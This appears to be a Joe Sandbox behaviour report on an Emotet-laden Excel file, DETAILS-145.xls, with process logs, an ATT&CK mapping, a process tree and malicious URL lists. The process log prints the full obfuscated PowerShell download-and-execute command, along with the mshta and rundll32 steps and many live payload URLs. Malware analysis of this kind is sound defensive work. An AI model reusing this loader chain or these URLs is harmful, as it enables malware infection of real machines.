                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: powershell.exe, 00000006.00000002.682247362.00000000002C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018D374 mov eax, dword ptr fs:[00000030h]9_2_0018D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023D374 mov eax, dword ptr fs:[00000030h]10_2_0023D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CD374 mov eax, dword ptr fs:[00000030h]11_2_001CD374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0078D374 mov eax, dword ptr fs:[00000030h]12_2_0078D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0060D374 mov eax, dword ptr fs:[00000030h]14_2_0060D374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_001ED374 mov eax, dword ptr fs:[00000030h]15_2_001ED374
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",MOdnuTnMIi
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wlnljconerohcjaz\cekfidpy.yhq",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",NSMcfMaGRbKFCL
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gdtjuon\eryfdrtz.qpz",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",NscZMRYpRiE
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mqenzhvktn\czphbxmqtcm.nzb",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DwOwDiNvSb
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oyfgrjdbgbuk\aagpsdybai.shx",DllRegisterServer
                            Source: Yara matchFile source: DETAILS-145.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: 0000000F.00000002.615997372.00000000001D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522595880.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616558132.0000000002411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616683416.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575020499.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616861944.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617100945.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673429165.0000000000910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.471313951.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522683360.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.577775644.00000000005F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574936921.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522655348.0000000003171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575098711.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575908934.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675391959.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.681991915.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673370884.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617022562.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618251514.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574901913.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673563319.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.677112650.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618216688.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: C:\ProgramData\QWER.dll, type: DROPPED
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 21 Scripting | 1 Windows Service | 1 Windows Service | 1 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 13 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 13 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 21 Scripting | Security Account Manager | 38 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 11 Command and Scripting Interpreter | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 21 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 122 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | 1 Service Execution | Network Logon Script | Network Logon Script | 2 Masquerading | LSA Secrets | 1 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | 1 PowerShell | Rc.common | Rc.common | 1 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 11 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Hidden Files and Directories | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Rundll32 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Behavior Graph ID: 562407, Sample: DETAILS-145.xls, Startdate: 28/01/2022, Architecture: WINDOWS, Score: 100

DNS/IP Info (top level): 210.57.209.142 (UNAIR-AS-IDUniversitasAirlanggaID, Indonesia); 118.98.72.86 (TELKOMNET-AS-APPTTelekomunikasiIndonesiaID, Indonesia); 31 other IPs or domains
Signatures (top level): Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures

Process tree:
EXCEL.EXE (started)
  dropped: C:\Users\user\Desktop\DETAILS-145.xls, Composite
  cmd.exe (started)
    mshta.exe (started)
      DNS/IP: 91.240.118.168, 49167, 49168, 80, GLOBALLAYERNL, unknown
      powershell.exe (started)
        DNS/IP: jeffreylubin.igclout.com, 74.208.236.157, 49170, 80, ONEANDONE-ASBrauerstrasse48DE, United States
        DNS/IP: kuyporn.com, 172.67.149.209, 49169, 80, CLOUDFLARENETUS, United States
        dropped: C:\ProgramData\QWER.dll, PE32
        signature: Powershell drops PE file
        cmd.exe (started)
          rundll32.exe (started)
            rundll32.exe (started)
              dropped: C:\Windows\SysWOW64\...\cekfidpy.yhq (copy), PE32
              signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
              rundll32.exe (started)
                rundll32.exe (started)
                  signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                  rundll32.exe (started)

Source | Detection | Scanner | Label | Link
DETAILS-145.xls | 35% | ReversingLabs | Document-Excel.Trojan.Emotet |
Source | Detection | Scanner | Label | Link
C:\ProgramData\QWER.dll | 100% | Joe Sandbox ML | |
                            No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
kuyporn.com | 172.67.149.209 | true | false | | unknown
jeffreylubin.igclout.com | 74.208.236.157 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://jeffreylubin.igclout.com/wp-admin/vzOG/ | true | Avira URL Cloud: malware | unknown
http://kuyporn.com/wp-content/XSs5/ | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/qqw/aas/se.html | true | Avira URL Cloud: malware | unknown
http://91.240.118.168/qqw/aas/se.png | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                • Avira URL Cloud: malware
                                unknown
                                https://algzor.com/wp-includes/gpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://www.protware.comth4cMmshta.exe, 00000004.00000003.430440869.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://wallacebradley.com/css/YcDc927SJR/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://www.%s.comPArundll32.exe, 00000013.00000002.682859735.0000000002C17000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                low
                                http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.htmlmshta.exe, 00000004.00000003.431930961.00000000024A5000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://docs-construction.com/wp-powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://bluwom-milano.com/wp-content/FEj3y4z/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://esaci-egypt.com/wp-includes/W7qXVeGp/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://thaireportchannel.com/wp-includes/KaWZp0odkEO/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://kuyporn.compowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://91.240.118.168/qqw/aas/se.htmlNEmshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://flybustravel.com/cgi-bin/2TjUH/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://kuyporn.com/wp-content/XSs5/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://91.240.118.168/qqw/aas/se.htmlBDETAILS-145.xls.0.drtrue
                                • Avira URL Cloud: malware
                                unknown
                                https://bluwom-milano.com/wp-conpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://bluwom-milano.com/wp-content/FEj3y4z/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://jeffreylubin.igclout.compowershell.exe, 00000006.00000002.690900197.000000000380B000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690900197.000000000380B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.protware.commshta.exe, 00000004.00000002.454946718.0000000002E30000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://91.240.118.168/qqw/aas/se.html&Emshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://91.240.118.168/qqw/aas/se.htmlnmshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://91.240.118.168/qqw/aas/sepowershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000013.00000002.682859735.0000000002C17000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://thaireportchannel.com/wppowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://91.240.118.168/qqw/aas/se.htmlsmshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://jeffreylubin.igclout.com/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://91.240.118.168/qqw/aas/se.htmlC:mshta.exe, 00000004.00000002.454965047.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.452003548.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430447784.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.451488221.0000000002E55000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://flybustravel.com/cgi-bin/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://esaci-egypt.com/wp-inclupowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://91.240.118.168powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    unknown
                                    https://algzor.com/wp-includes/ghFXVrGLEh/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://algzor.com/wp-includes/ghFXVrGLEh/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://91.240.118.168/qqw/aas/se.htmlmshtamshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://pcovestudio.com/wp-adminpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562407
Start date: 28.01.2022
Start time: 21:03:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: DETAILS-145.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@29/9@2/36
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 20.6% (good quality ratio 19.4%)
• Quality average: 72%
• Quality standard deviation: 25.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 53
• Number of non-executed functions: 193
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mshta.exe, PID 2816 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 1516 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: DETAILS-145.xls

